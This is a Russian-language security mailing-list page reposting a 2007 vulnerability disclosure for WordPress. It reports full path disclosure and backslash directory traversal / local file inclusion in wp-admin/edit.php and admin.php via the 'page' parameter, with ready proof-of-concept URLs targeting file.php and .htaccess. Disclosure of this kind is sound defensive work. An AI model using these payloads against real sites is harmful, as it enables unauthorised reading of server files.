Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  CCMS v3.1 Demo <= SQL Injection Vulnerability 0day

  CuteNews Arbitrary File Download AllVersion

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:30 декабря 2007 г.
Subject:New Local file include, Directory traversal and Full path disclosure in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною новых Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файлах edit.php и admin.php в параметре page

Full path disclosure:

http://site/wp-admin/edit.php?page=

http://site/wp-admin/admin.php?page=

Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).

Local file include и Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php

http://site/wp-admin/edit.php?page=\..\..\.htaccess

http://site/wp-admin/admin.php?page=\..\..\file.php

http://site/wp-admin/admin.php?page=\..\..\.htaccess

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1683/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru